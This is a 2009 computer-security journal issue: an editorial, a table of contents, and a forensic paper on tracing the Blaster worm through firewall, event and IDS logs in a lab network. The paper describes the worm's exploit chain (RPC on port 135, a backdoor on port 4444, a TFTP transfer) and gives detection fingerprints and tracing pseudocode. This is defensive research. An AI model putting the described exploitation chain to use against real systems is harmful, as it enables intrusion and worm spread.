8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 1/215
International Journal of
Computer Science
& Information Security
© IJCSIS PUBLICATION 2009
IJCSIS Vol. 4, No. 1 & 2, August 2009
ISSN 1947-5500
Editorial
Message from IJCSIS Editor
The Editorial Board presents to the research community the 4th volume of the International Journal of Computer Science and Information Security (IJCSIS, Vol. 4, No. 1 & 2, August 2009). We pursue our commitment to quality publication and high-impact research dissemination; accordingly, the IJCSIS Technical Program Committee has been very selective, with a 29.5% paper acceptance rate after the peer-review process. Besides our open access policy allowing all publications to be downloaded, all IJCSIS articles are indexed in major academic and scientific databases.
Moreover, this edition offers a good blend of quality research papers in computer networking, information and communication security, mobile and wireless networking, QoS issues, etc. We thank all authors who have submitted and published their research papers in this issue and look forward to long-term fruitful research collaborations. Special thanks to the anonymous reviewers for their service to IJCSIS.
We hope that you will find this IJCSIS edition a useful state-of-the-art literature
reference.
Available at http://sites.google.com/site/ijcsis/
IJCSIS Vol. 4, No. 1 & 2,
August 2009 Edition
ISSN 1947-5500
© IJCSIS 2009, USA.
IJCSIS EDITORIAL BOARD
Dr. Gregorio Martinez Perez, Associate Professor (Profesor Titular de Universidad), University of Murcia (UMU), Spain

Dr. Yong Li, School of Electronic and Information Engineering, Beijing Jiaotong University, P.R. China

Dr. Sanjay Jasola, Professor and Dean, School of Information and Communication Technology, Gautam Buddha University, India

Dr. Riktesh Srivastava, Assistant Professor, Information Systems, Skyline University College, University City of Sharjah, Sharjah, PO 1797, UAE

Dr. Siddhivinayak Kulkarni, University of Ballarat, Ballarat, Victoria, Australia

Professor (Dr) Mokhtar Beldjehem, Sainte-Anne University, Halifax, NS, Canada
TABLE OF CONTENTS
1. Tracing Technique for Blaster Attack
Siti Rahayu S., Robiah Y., Shahrin S., Faizal M. A., Mohd Zaki M., Irda R., Faculty of Information Technology and Communication, Universiti Teknikal Malaysia Melaka, Durian Tunggal, Melaka, Malaysia
2. Optimization of Bit Plane Combination for Efficient Digital Image Watermarking
Sushma Kejgir & Manesh Kokare, Electronics & Tele. Engineering, SGGS Institute of Engineering & Technology, Vishnupuri, Nanded, Maharashtra, India
3. Retrieval of Remote Sensing Images Using Colour & Texture Attribute
Priti Maheswary, Research Scholar, Department of Computer Application, Maulana Azad National Institute of Technology, Bhopal, India
Dr. Namita Srivastava, Assistant Professor, Department of Mathematics, Maulana Azad National Institute of Technology, Bhopal, India
4. Consideration Points: Detecting Cross-Site Scripting
Suman Saha, Dept. of Computer Science and Engineering, Hanyang University, Ansan, South Korea
5. Experimental Performances Analysis of Load Balancing Algorithms in IEEE 802.11
HAMDI Salah, Computer Sciences Department, ISSAT of Sousse, Sousse, Tunisia
SOUDANI Adel & TOURKI Rached, Physics Department, E μe Laboratory, Faculty of Sciences of Monastir, Monastir, Tunisia
6. Exploration of the Gap Between Computer Science Curriculum and Industrial I.T Skills
Requirements
Azeez Nureni Ayofe & Azeez Raheem Ajetola, Department of Maths & Computer Science, College of Natural and Applied Sciences, Fountain University, Osogbo, Osun State, Nigeria.
7. Visualization of Mined Pattern and Its Human Aspects
Ratnesh Kumar Jain & Dr. R. S. Kasana, Department of Computer Science & Applications, Dr. H. S. Gour University, Sagar, MP (India)
Dr. Suresh Jain, Department of Computer Engineering, Institute of Engineering & Technology, Devi Ahilya University, Indore, MP (India)
8. Handwritten Farsi Character Recognition using Artificial Neural Network
Reza Gharoie Ahangar & Mohammad Farajpoor Ahangar, Azad University, Babol Branch, Iran
9. Energy Efficient Location Aided Routing Protocol for Wireless MANETs
Mohammad A. Mikki, Computer Engineering Department, IUG, P. O. Box 108, Gaza, Palestine
10. Constraint Minimum Vertex Cover in K-Partite Graph: Approximation Algorithm and
Complexity Analysis
Kamanashis Biswas, Computer Science and Engineering Department, Daffodil International University, 102, Shukrabad, Dhaka-1207
S.A.M. Harun, Right Brain Solution, Flat# B4, House# 45, Road# 27, Banani, Dhaka
11. Hardware Virtualization Support In INTEL, AMD And IBM Power Processors
Kamanashis Biswas, Lecturer, CSE Dept., Daffodil International University
12. Dynamic Multimedia Content Retrieval System in Distributed Environment
R. Sivaraman, R. Prabakaran & S. Sujatha, Anna University Tiruchirappalli, Tiruchirappalli, India
13. Enhanced Mode Selection Algorithm for H.264 encoder for Application in Low Computational
power devices
Sourabh Rungta, CSE Department, RCET, Durg, India
Kshitij Verma, ABV-IIITM, Gwalior, India
Neeta Tripathi, ECE Department, RSRCET, Durg, India
Anupam Shukla, ICT Department, ABV-IIITM, Gwalior, India
14. Channel Equalization in Digital Transmission
Md. Taslim Arefin, Dept. of CSE, Faculty of Engineering, University of Development Alternative (UODA), Dhaka, Bangladesh
Kazi Mohammed Saidul Huq, Miguel Bergano & Atilio Gameiro, Research Engineer, Institute of Telecommunications, Aveiro, Portugal
15. An Enhanced Static Data Compression Scheme Of Bengali Short Message
Abu Shamim Mohammad Arif, Assistant Professor, Computer Science & Engineering Discipline, Khulna University, Khulna, Bangladesh
Asif Mahamud, Computer Science & Engineering Discipline, Khulna University, Khulna, Bangladesh
Rashedul Islam, Computer Science & Engineering Discipline, Khulna University, Khulna, Bangladesh
16. QoS Provisioning Using Hybrid FSO-RF Based Hierarchical Model for Wireless Multimedia Sensor Networks
Saad Ahmad Khan & Sheheryar Ali Arshad, Department of Electrical Engineering, University of Engineering & Technology, Lahore, Pakistan, 54890
17. Minimizing Cache Timing Attack Using Dynamic Cache Flushing (DCF) Algorithm
Jalpa Bani and Syed S. Rizvi, Computer Science and Engineering Department, University of Bridgeport, Bridgeport, CT 06601
18. A Survey of Attacks, Security Mechanisms and Challenges in Wireless Sensor Networks
Dr. G. Padmavathi, Prof. and Head, Dept. of Computer Science, Avinashilingam University for Women, Coimbatore, India
Mrs. D. Shanmugapriya, Lecturer, Dept. of Information Technology, Avinashilingam University for Women, Coimbatore, India
19. Computational Complexities and Breaches in Authentication Frameworks of BWA
Raheel Maqsood Hashmi, Arooj Mubashara Siddiqui, Memoona Jabeen, Khurram S. Alimgeer, Shahid A. Khan, Department of Electrical Engineering, COMSATS Institute of Information Technology Islamabad, Pakistan
20. Codebook Design Method for Noise Robust Speaker Identification based on Genetic Algorithm
Md. Rabiul Islam, Department of Computer Science & Engineering, Rajshahi University of Engineering & Technology, Rajshahi-6204, Bangladesh
Md. Fayzur Rahman, Department of Electrical & Electronic Engineering, Rajshahi University of Engineering & Technology, Rajshahi-6204, Bangladesh
21. A Step towards Software Corrective Maintenance: Using RCM model
Shahid Hussain, Namal University, Mianwali
Dr. Bashir Ahmad, ICIT, Gomal University, D.I.Khan
Muhammad Zubair Asghar, ICIT, Gomal University, D.I.Khan
22. Electronic Authority Variation
M.N. Doja† and Dharmender Saini††, Jamia Millia Islamia (CSE Department), New Delhi, India
23. A Novel Model for Optimized GSM Network Design
Alexei Barbosa de Aguiar, Plácido Rogério Pinheiro, Álvaro de Menezes S. Neto, Ruddy P. P. Cunha & Rebecca F. Pinheiro, Graduate Program in Applied Informatics, University of Fortaleza, Av. Washington Soares 1321, Sala J-30, Fortaleza, CE, Brazil, 60811-905
24. A Study on the Factors That Influence the Consumers’ Trust on E-commerce Adoption
Yi Yi Thaw, Department of Computer and Information Sciences, Universiti Teknologi PETRONAS, Tronoh, Malaysia
Ahmad Kamil, Department of Computer and Information Sciences, Universiti Teknologi PETRONAS, Tronoh, Malaysia
Dhanapal Durai Dominic, Department of Computer and Information Sciences, Universiti Teknologi PETRONAS, Tronoh, Malaysia
25. The Uniformization Process of the Fast Congestion Notification (FN)
Mohammed M. Kadhum, MIEEE, and Suhaidi Hassan, SMIEEE, InterNetWorks Research Group, College of Arts and Sciences, Universiti Utara Malaysia, 06010 UUM Sintok, MALAYSIA
26. On The Optimality Of All-To-All Broadcast In k-ary n-dimensional Tori
Jean-Pierre Jung & Ibrahima Sakho, UFR MIM, Université de Metz, Ile du Saulcy BP 80794 - 57012 Metz Cedex 01, France
27. Resource Matchmaking Algorithm using Dynamic Rough Set in Grid Environment
Iraj Ataollahi & Mortza Analoui, Computer Engineering Department, Iran University of Science and Technology, Tehran, Iran
28. Impact of Rushing Attack on Multicast in Mobile Ad Hoc Network
V. Palanisamy, Reader and Head (i/c), Department of Computer Science & Engineering, Alagappa University, Karaikudi, Tamilnadu, India
P. Annadurai, Lecturer in Computer Science, Kanchi Mamunivar Centre for Post Graduate Studies (Autonomous), Lawspet, Puducherry, India.
29. A Hybrid Multi-objective Particle Swarm Optimization Method to Discover Biclusters in Microarray Data
S. Amirhassan Monadjemi, Department of Computer Engineering, Faculty of Engineering, University of Isfahan, Isfahan, 81746, Iran
Mohsen Lahkargir*, Department of Computer Engineering, Islamic Azad University, Najafabad Branch, Isfahan, 81746, Iran
Ahmad Baraani Dastjerdi, Department of Computer Engineering, Faculty of Engineering, University of Isfahan
30. Predictors Of Java Programming Self–Efficacy Among Engineering Students In A Nigerian
University
Philip Olu Jegede, Institute of Education, Obafemi Awolowo University, Ile-Ife, Nigeria
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1, 2009
Tracing Technique for Blaster Attack

Siti Rahayu S., Robiah Y., Shahrin S., Faizal M. A., Mohd Zaki M., Irda R.
Faculty of Information Technology and Communication
Universiti Teknikal Malaysia Melaka,
Durian Tunggal, Melaka, Malaysia
sitirahayu@utem.edu.my, robiah@utem.edu.my, shahrinsahib@utem.edu.my,
faizalabdollah@utem.edu.my, zaki.masud@utem.edu.my, irda@utem.edu.my
Abstract - The Blaster worm of 2003 is still persistent: the infection appears to have successfully transitioned to new hosts as the original systems are cleaned or shut off, suggesting that the Blaster worm, and other similar worms, will remain significant Internet threats for many years after their initial release. This paper proposes a technique for tracing the Blaster attack from various logs at different OSI layers, based on the fingerprint of the Blaster attack in victim logs, attacker logs and the IDS alert log. The researchers intend this preliminary investigation of this particular attack to serve as a basis for further research in alert correlation and computer forensic investigation.
Keywords: tracing technique, Blaster attack, fingerprint, log
I. INTRODUCTION
The Blaster worm of 2003 infected at least 100,000 Microsoft Windows systems and cost millions in damage. In spite of cleanup efforts, an antiworm, and a removal tool from Microsoft, the worm persists [1]. According to [2], research on the Blaster attack is significant because malware such as the Blaster worm has evolved into a complex environment and has the potential for reinfection, by either itself or another worm, using the same exploit.
Recent tools targeted at eradicating it appear to have had little effect on the global population. In the persistent-population analysis, the infection appears to have successfully transitioned to new hosts as the original systems are cleaned or shut off, suggesting that the Blaster worm, and other similar worms, will remain significant Internet threats for many years after their initial release; the Blaster worm is not going away anytime soon. Therefore, the objective of this paper is to propose a technique for tracing the Blaster attack from various logs at different OSI layers. The researchers intend this preliminary investigation of this particular attack to serve as a basis for further research in alert correlation and computer forensic investigation.
II. RELATED WORK
W32.Blaster.Worm is a worm that exploits the DCOM RPC vulnerability (described in Microsoft Security Bulletin MS03-026) using TCP port 135. If a connection attempt to TCP port 135 is successful, the worm sends an RPC bind command and an RPC request command containing the buffer overflow and exploit code. The exploit opens a backdoor on TCP port 4444, which waits for further commands. The infecting system then issues a command to the newly infected system to transfer the worm binary using Trivial File Transfer Protocol (TFTP) on UDP port 69 from the infecting system and execute it.
The worm targets only Windows 2000 and Windows XP machines. While Windows NT and Windows 2003 Server machines are vulnerable to the aforementioned exploit (if not properly patched), the worm is not coded to replicate to those systems. This worm attempts to download the msblast.exe file to the %WinDir%\system32 directory and then execute it.
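The three-stage network behaviour described above (TCP/135 exploit, TCP/4444 backdoor, UDP/69 TFTP transfer) can be captured as a small data structure for later matching against log records. This is a minimal sketch of our own, not the authors' code; the names and structure are illustrative assumptions, while the ports and protocols come from the text.

```python
# Hypothetical sketch: the Blaster network fingerprint described above,
# expressed as data for later matching against connection records.
BLASTER_FINGERPRINT = {
    "exploit":  {"proto": "TCP", "dst_port": 135},   # DCOM RPC vulnerability
    "backdoor": {"proto": "TCP", "dst_port": 4444},  # backdoor awaiting commands
    "transfer": {"proto": "UDP", "dst_port": 69},    # TFTP pull of msblast.exe
}

def matches_stage(proto, dst_port, stage):
    """True if one connection record matches the given stage of the fingerprint."""
    sig = BLASTER_FINGERPRINT[stage]
    return proto == sig["proto"] and dst_port == sig["dst_port"]
```

A record such as a TCP connection to destination port 135 would match the "exploit" stage; the same idea underlies the log-tracing algorithms later in the paper.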
The Blaster worm’s impact was not limited to a short period in August 2003. According to [3], a published survey of 19 research universities showed that each spent an average of US$299,579 during a five-week period to recover from the Blaster worm and its variants. The cost of this cleanup effort has helped solidify a growing view of worms not as acts of Internet vandalism but as serious crimes. Although the original Blaster.A author was never caught, authors of several other variants have been apprehended.
There are various techniques used by other researchers to detect attacks; they can be signature-based, anomaly-based or specification-based. The signature-based approach, as described by [4], maintains a database of known intrusion techniques and detects intrusions by comparing behaviour against the database, whereas anomaly-based detection techniques analyse user behaviour and the statistics of a process in normal situations and check whether the system is being used in a different manner. [5] has described that this technique can overcome misuse detection problems by focusing on normal system behaviour rather than attack behaviour. The specification-
based detection, according to [6], relies on program specifications that describe the intended behaviour of security-critical programs. The research trend for detecting attacks has moved towards combinations or hybrids, either of signature-based with anomaly-based, as done by [7], [8] and [5], or of specification-based with anomaly-based, as done by [9].
For the purpose of this preliminary experiment, the researchers have selected only the signature-based detection technique and, in future, intend to combine it with the anomaly-based detection technique to further improve attack tracing.
System log files contain valuable evidence pertaining to computer attacks. However, the log files are often massive, and much of the information they contain is not relevant to the network administrator. Furthermore, the files almost always have a flat structure, which limits the ability to query them. Thus, it is extremely difficult and time-consuming to extract and analyse the traces of attacks from log files [10]. This paper selects, from each log file, the most valuable attributes relevant to the attack being traced. Our research is a preliminary experiment in tracing the Blaster.B attack in diverse log resources to provide more complete coverage of the attack space [11].
According to [12], the network attack analysis process involves three main procedures: initial response, media imaging duplication, and imaged media analysis. Our proposed approach focuses on the procedures of media imaging duplication and imaged media analysis. This paper describes how these procedures can be applied to the numerous logs, to derive the top facts in each of the diverse connections and locate malicious events spread across the network.
III. EXPERIMENT APPROACH
Our proposed approach in this preliminary experiment used four methods: Network Environment Setup, Attack Activation, Log Collection and Log Analysis, as depicted in Figure 1. The details of the methods are discussed in the following sub-sections.
Figure 1: Methods used in the preliminary experiment
A. Network Environment Setup
The network setup for this experiment refers to the network simulation setup [13] done by the MIT Lincoln Lab; it has been slightly modified to suit our experiment's environment, using only CentOS and Windows XP, whereas the MIT Lincoln Lab used Linux, Windows NT, SunOS, Solaris, MacOS and Win98. The network design is shown in Figure 2.
Figure 2: Preliminary Network Design for Blaster Attack Simulation
This network design consists of two switches configured as Vlan 3 (192.168.3.0) and Vlan 2 (192.168.2.0), one router, two servers for the Intrusion Detection System (IDS) and Network Time Protocol (NTP) running on CentOS 4.0, two victims running Windows XP on each Vlan, and one attacker running on Vlan 2. The log files expected to be analysed are four types of log files (personal firewall log, security log, system log and application log) generated by host-level devices and one log file generated by a network-level device (the alert log of the IDS). Ethereal 0.10.7 [6] was installed on each host to verify the traffic between that host and other devices, and a tcpdump script was activated on the IDS to capture the whole traffic within Vlan 2 and Vlan 3.
B. Attack Activation
The event viewer and time synchronisation using the NTP server are configured before the attack is launched. Then the Blaster variant is installed and activated on the attacker machine. The experiment runs for 30 minutes. Once the victim
machine is successfully infected by the Blaster, the experiment is terminated.
C. Log Collection
Logs are collected at two different OSI layers: the application layer and the network layer. Each victim and attacker machine generates a personal firewall log, security log, application log, system log and Ethereal log. The IDS machine generates an alert log and a tcpdump log. The Ethereal and tcpdump files are used to verify the simulated attack and compare it with the other log files. For the purpose of this paper, both verification logs are not discussed due to page limits. The summary of the various log files generated is shown in Table I.
TABLE I. Various log files generated from two different OSI layers
D. Log Analysis
In this network attack analysis process, the researchers have implemented media imaging duplication using the IDS, and imaged media analysis by analysing the logs listed in Table I. The objective of the log analysis is to identify the Blaster attack by observing its specific characteristics: the attack exploits the DCOM RPC vulnerability using TCP port 135, the worm attempts to download the msblast.exe file to the %WinDir%\system32 directory and then execute it, and the exploit opens a backdoor on TCP port 4444, which waits for further commands. In this analysis, the researchers have selected the valuable attributes that are significant to the attack being traced, as shown in Table II.
TABLE II. Selected Log Attributes

Log filename       Selected Log Attribute      Variable
pfirewall.log      Source IP address           SrcIP
                   Destination IP address      DstIP
                   Destination port            Dstport
                   Source port                 Srcport
                   Action                      Act
                   Date                        D
                   Time                        T
security.evt,      Date                        D
application.evt,   Time                        T
system.evt         Category                    Cat
alert.log          Date                        D
                   Time                        T
                   Source IP address           SrcIP
                   Destination IP address      DstIP
                   Category                    Cat
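As an illustration of how these attributes might be pulled out of a raw log entry, the sketch below parses one Windows XP personal-firewall line into the Table II variables. The whitespace-separated field order follows the sample entries reproduced later in the paper; the function name and dictionary keys are our own assumptions, not part of the authors' method.

```python
def parse_pfirewall_line(line):
    """Split one pfirewall.log entry into the Table II attribute variables."""
    fields = line.split()
    return {
        "D": fields[0],             # Date
        "T": fields[1],             # Time
        "Act": fields[2],           # Action (OPEN, OPEN-INBOUND, DROP, CLOSE)
        "proto": fields[3],         # Protocol
        "SrcIP": fields[4],         # Source IP address
        "DstIP": fields[5],         # Destination IP address
        "Srcport": int(fields[6]),  # Source port
        "Dstport": int(fields[7]),  # Destination port
    }

# Example with one of the victim log entries shown later in the paper:
rec = parse_pfirewall_line(
    "2009-05-07 14:13:34 OPEN-INBOUND TCP 192.168.2.150 192.168.3.13 "
    "3284 135 - - - - - - - -")
```

Here `rec["Dstport"]` is 135, the DCOM RPC port that the Blaster fingerprint targets.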
IV. PROPOSED TRACING TECHNIQUE
In order to identify the attacker, the researchers have proposed a tracing technique, depicted in Figure 3, which consists of three elements: victim, attacker and IDS. The algorithm used for each element is elaborated in the following sub-sections.
Figure 3: Proposed Tracing Technique
A. Tracing Algorithm for Victim logs

In our tracing procedure, the tracing activity is primarily done at the victim site by examining the Blaster fingerprint for victim logs, as shown in Figure 4. These
Blaster fingerprints are derived from several studies done by [14], [15], [16].
Figure 4: Fingerprint of Blaster attack in each selected victim logs
In this analysis, the researchers have specified 192.168.3.13 as one of the victims and 192.168.2.150 as the attacker (refer to Figure 2). The tracing tasks start at the victim personal firewall log, followed by the security log, system log and application log. The data can be further analysed by referring to the Blaster fingerprint for attacker logs, examining the attacker personal firewall and security logs. Figures 6, 9 and 12 show the relevant information extracted from the selected logs.
Figure 5 shows the tracing algorithm for each selected victim log, based on the Blaster attack fingerprint in Figure 4.
The aim of these tracing tasks is to examine the traces left by the Blaster in the selected logs. The trace is based on the Blaster attack fingerprint and is primarily done in the personal firewall log. In these tracing tasks, the researchers have manipulated the attributes selected in Table II. The search starts with the victim IP address, 192.168.3.13, and the action OPEN-INBOUND, which shows that the attacker is trying to open a connection. The protocol used is TCP and the destination port is 135, which shows that the Blaster attack attempts to establish a connection.
Where:
x = Victim Host
y = Attacker Host

Victim Personal firewall log tracing algorithm
Input Action, Protocol, Destination Port
If (Action = Open-Inbound) and (Protocol = TCP) and (Destination Port = 135)
    Date = DFWx
    Time = TFW1x
    Source IP = SrcIPx
    Destination IP = DestIPx
    Source Port = SrcPortax
    Print Source IP, Date, Time, Source Port, Destination IP, Action, Protocol, Destination Port
    If (Action = Open) and (Protocol = TCP) and (Destination Port = 4444) and (Date = DFWx) and (Time >= TFW1x) and (Source IP = SrcIPx) and (Destination IP = DestIPx)
        Time = TFW2x
        Source Port = SrcPortex
        Print Source IP, Date, Time, Source Port, Destination IP, Action, Protocol, Destination Port
    End
End

Victim Application log tracing algorithm
Input Date (DFWx)
Input Time (TFW2x)
Input AuditCategory
If (Date = DFWx) and (Time >= TFW2x) and (AuditCategory = '\system32\svchost.exe, generated an application error')
    Time = TApplx
    Date = DApplx
    Print Time, Date, AuditCategory
End

Victim System log tracing algorithm
Input Date (DApplx)
Input Time (TApplx)
Input AuditCategory
If (Date = DApplx) and (Time >= TApplx) and (AuditCategory = 'The Remote Procedure Call (RPC) service terminated unexpectedly')
    Time = TSysx
    Date = DSysx
    Print Time, Date, AuditCategory
End

Victim Security log tracing algorithm
Input Date (DSysx)
Input Time (TSysx)
Input AuditCategory
If (Date = DSysx) and (Time >= TSysx) and (AuditCategory = 'Windows is shutting down')
    Time = TSecx
    Date = DSecx
    Print Time, Date, AuditCategory
End
Figure 5: Tracing algorithm for Victim logs
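The personal-firewall part of the victim tracing in Figure 5 can be sketched as runnable code, under the assumption that log entries have already been parsed into dictionaries keyed by the Table II variables; the function and key names are our own, not the authors' implementation. One caveat: the figure matches the port-4444 step with action OPEN, while the sample victim log records it as DROP, so this sketch accepts either.

```python
def trace_victim_firewall(records, victim_ip):
    """Two-step trace: find the TCP/135 attempt, then the TCP/4444 exploit."""
    attempt = None
    for r in records:   # step 1: OPEN-INBOUND connection attempt on TCP/135
        if (r["Act"] == "OPEN-INBOUND" and r["proto"] == "TCP"
                and r["Dstport"] == 135 and r["DstIP"] == victim_ip):
            attempt = r
            break
    if attempt is None:
        return None
    result = {"attacker": attempt["SrcIP"], "date": attempt["D"],
              "time": attempt["T"], "SrcPorta": attempt["Srcport"],
              "SrcPorte": None}
    for r in records:   # step 2: same host pair, same date, later time, TCP/4444
        if (r["proto"] == "TCP" and r["Dstport"] == 4444
                and r["Act"] in ("OPEN", "DROP")
                and r["D"] == attempt["D"] and r["T"] >= attempt["T"]
                and r["SrcIP"] == attempt["SrcIP"]
                and r["DstIP"] == attempt["DstIP"]):
            result["SrcPorte"] = r["Srcport"]   # source port of the exploit
            break
    return result
```

Note that `HH:MM:SS` timestamps compare correctly as strings, which is why the `>=` time check works without date-time parsing.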
Victim Personal firewall log
2009-05-07 14:13:34 OPEN-INBOUND TCP 192.168.2.150 192.168.3.13 3284 135 - - - - - - - -
2009-05-07 14:14:01 DROP TCP 192.168.2.150 192.168.3.13 3297 4444 48 S 862402054 0 64240 - - -

Victim Security log
5/7/2009 2:20:03 PM Security Success Audit System Event 513 NT AUTHORITY\SYSTEM AYU Windows is shutting down. All logon sessions will be terminated by this shutdown.

Victim System log
5/7/2009 2:19:00 PM Service Control Manager Error None 7031 N/A AYU The Remote Procedure Call (RPC) service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Reboot the machine.
5/7/2009 2:19:00 PM USER32 Information None 1074 NT AUTHORITY\SYSTEM AYU The process winlogon.exe has initiated the restart of AYU for the following reason: No title for this reason could be found
Minor Reason: 0xff
Shutdown Type: reboot
Comment: Windows must now restart because the Remote Procedure Call (RPC) service terminated unexpectedly

Victim Application log
5/7/2009 2:20:01 PM EventSystem Error (50) 4609 N/A AYU The COM+ Event System detected a bad return code during its internal processing. HRESULT was 800706BA from line 44 of d:\nt\com\com1x\src\events\tier1\eventsystemobj.cpp. Please contact Microsoft Product Support Services to report this error.
5/7/2009 2:19:00 PM DrWatson Information None 4097 N/A AYU The application, C:\WINDOWS\system32\svchost.exe, generated an application error. The error occurred on 05/07/2009 @ 14:19:00.441. The exception generated was c0000005 at address 0018759F (<nosymbols>)
5/7/2009 2:14:00 PM Application Error Error (100) 1000 N/A AYU Faulting application svchost.exe, version 5.1.2600.0, faulting module unknown, version 0.0.0.0, fault address 0x00000000.
5/7/2009 2:20:03 PM EventLog Information None 6006 N/A AYU The Event log service was stopped.
Figure 6: Extracted data from Victim logs
From these traces, the source IP address (SrcIPx) and source port of the potential attacker are known: the source IP address is 192.168.2.150 and the source port (SrcPortax) is 3284. The date and time, 2009-05-07 14:13:34, show when the attack happened.
Subsequently, to trace whether the attack was exploited, the log is further searched on the same date and within the time range of the Blaster attack's attempt to establish a connection. The destination IP address (DestIPx) is the victim IP address, the source IP address (SrcIPx) is the potential attacker IP address, the action is DROP, the protocol used is TCP and the destination port is 4444. From this trace, the potential attacker's source port is known, and it indicates that the Blaster is exploited using port 4444. This attack can be further verified by examining the personal firewall log on the machine of the potential attacker.
To support the information obtained in the personal firewall log, further investigation is done in the security log, system log and application log. The effect of the exploitation can be traced by looking at the messages embedded in the application log, system log and security log, which show the messages "C:\WINDOWS\system32\svchost.exe, generated an application error", "Windows must now restart because the Remote Procedure Call (RPC) service terminated unexpectedly" and "Windows is shutting down. All logon sessions will be terminated by this shutdown" respectively. All of these messages show the effect of the Blaster attack, which exploits the RPC service. The highlighted data in Figure 6 are extracted by using the tracing algorithm in Figure 5 accordingly.
B. Tracing Algorithm for Attacker logs
The tracing algorithm for the attacker logs in Figure 8 is based on the Blaster attack fingerprint in Figure 7. The same tracing steps used for the victim logs are used in investigating the attacker logs. The only difference is that the action is OPEN, and extra information obtained from the previous tracing tasks (source port SrcPortax, date DFWx and time TFW1x) is used to verify the existence of communications between the attacker and victim machines on port 135.
Figure 7: Fingerprint of Blaster attack in each selected attacker log
Then, to verify that an exploitation was done by the attacker on the victim machine, the main attributes used in the personal firewall log are the destination IP address, the action OPEN, the protocol TCP, the destination port 4444, the source port (SrcPortex), the date (DFWy) and the time (TFW2y).
To validate the information obtained in the attacker personal firewall log, further analysis is done in the security log, system log and application log. The process creation is found in the security log with the message "A new process has been created" and the Image File Name: C:\Documents and Settings\aminah\Desktop\Blaster.exe.
Where:
x = Victim Host
y = Attacker Host

Attacker Personal firewall log tracing algorithm
Input Action, Protocol, Destination Port
Input Date (obtained from tracing victim log, DFWx)
Input Time (obtained from firewall victim log, TFW1x)
Input Source IP (obtained from firewall victim log, SrcIPx)
Input Destination IP (obtained from firewall victim log, DestIPx)
Input Source Port to attempt attack (obtained from firewall victim log, SrcPortax)
Input Source Port to exploit attack (obtained from firewall victim log, SrcPortex)
If (Action = Open) and (Protocol = TCP) and (Destination Port = 135) and (Date = DFWx) and (Time <= TFW1x) and (Source IP = SrcIPx) and (Destination IP = DestIPx) and (Source Port = SrcPortax)
    Time = TFW1y
    Date = DFWy
    Print Source IP, Destination IP, Date, Time, Source Port, Destination Port, Protocol, Action
    If (Action = Open) and (Protocol = TCP) and (Destination Port = 4444) and (Date = DFWy) and (Time >= TFW1y) and (Source IP = SrcIPx) and (Destination IP = DestIPx) and (Source Port = SrcPortex)
        Time = TFW2y
        Print Source IP, Date, Time, Source Port, Destination IP, Action, Protocol, Destination Port
    End
End

Attacker Security log tracing algorithm
Input Date (DFWy)
Input Time (TFW2y)
Input AuditCategory
If (Date = DFWy) and (Time >= TFW2y) and (AuditCategory = 'A new process has been created')
    Time = TSecy
    Date = DSecy
    Print Time, Date, AuditCategory
End
Figure 8: Tracing algorithm for Attacker logs
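As an illustration only (the paper gives pseudocode, not an implementation), the firewall tracing algorithm of Figure 8 can be sketched in Python over log lines in the layout shown in Figure 9: date, time, action, protocol, source IP, destination IP, source port, destination port. The function and parameter names here are our own.

```python
# Sketch of the Figure 8 firewall tracing algorithm (illustrative, not
# the authors' code). Field order follows the Figure 9 log excerpt:
# date time action protocol src-ip dst-ip src-port dst-port.
def trace_attacker_firewall(lines, date_x, time1_x, src_ip, dst_ip,
                            sport_attempt, sport_exploit):
    """Return ((DFWy, TFW1y), (DFWy, TFW2y)) for the attempt on port 135
    and the exploit on port 4444, or None for stages not found."""
    attempt = exploit = None
    for line in lines:
        f = line.split()
        if len(f) < 8:
            continue
        d, t, action, proto, sip, dip, sport, dport = f[:8]
        # Stage 1: TCP OPEN to port 135 (attack attempt).
        if (attempt is None and action == "OPEN" and proto == "TCP"
                and dport == "135" and d == date_x and t <= time1_x
                and sip == src_ip and dip == dst_ip and sport == sport_attempt):
            attempt = (d, t)  # DFWy, TFW1y
        # Stage 2: TCP OPEN to port 4444 after the attempt (exploitation).
        elif (attempt is not None and exploit is None and action == "OPEN"
                and proto == "TCP" and dport == "4444" and d == attempt[0]
                and t >= attempt[1] and sip == src_ip and dip == dst_ip
                and sport == sport_exploit):
            exploit = (d, t)  # TFW2y
    return attempt, exploit
```

Run against the first two matching lines of Figure 9, the sketch returns the attempt at 14:13:33 and the exploitation at 14:13:35.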
The highlighted data in Figure 9 is extracted using the tracing algorithms in Figure 8.
The tracing provides evidence that the attack was launched by this attacker machine (192.168.2.150) at 2009-05-07 14:13:33, which is consistent with the extracted data in Figure 6. Hence, the attacker can be identified using this tracing algorithm.
Attacker Personal firewall log
2009-05-07 14:13:33 OPEN TCP 192.168.2.150 192.168.3.12 3283 135 - - - - - - - -
2009-05-07 14:13:33 OPEN TCP 192.168.2.150 192.168.3.13 3284 135 - - - - - - - -
2009-05-07 14:13:33 OPEN TCP 192.168.2.150 192.168.3.14 3285 135 - - - - - - - -
2009-05-07 14:13:33 OPEN TCP 192.168.2.150 192.168.3.15 3286 135 - - - - - - - -
2009-05-07 14:13:35 OPEN TCP 192.168.2.150 192.168.3.12 3296 4444 - - - - - - - -
2009-05-07 14:13:56 OPEN TCP 192.168.2.150 192.168.3.13 3297 4444 - - - - - - - -
2009-05-07 14:14:11 CLOSE TCP 192.168.2.150 192.168.3.12 3283 135 - - - - - - - -
2009-05-07 14:14:11 CLOSE TCP 192.168.2.150 192.168.3.13 3284 135 - - - - - - - -
2009-05-07 14:14:11 CLOSE TCP 192.168.2.150 192.168.3.15 3286 135 - - - - - - - -
2009-05-07 14:15:11 CLOSE TCP 192.168.2.150 192.168.3.12 3296 4444 - - - - - - - -
2009-05-07 14:15:11 CLOSE TCP 192.168.2.150 192.168.3.13 3297 4444 - - - - - - - -
2009-05-07 14:15:11 CLOSE TCP 192.168.2.150 192.168.3.34 3307 135 - - - - - - - -

Attacker Security log
5/7/2009 2:13:08 PM Security Success Audit Detailed Tracking 592 RAHAYU2\aminah RAHAYU2
"A new process has been created:
    New Process ID: 1640
    Image File Name: C:\Documents and Settings\aminah\Desktop\Blaster.exe
    Creator Process ID: 844
    User Name: aminah
    Domain: RAHAYU2
    Logon ID: (0x0,0x17744)"
Figure 9: Extracted data from Attacker logs
C. Tracing Algorithm for IDS logs
The Blaster attack fingerprint in Figure 10 is the basis for the tracing algorithm for IDS alert logs depicted in Figure 11.

Figure 10: Fingerprint of Blaster attack in IDS log
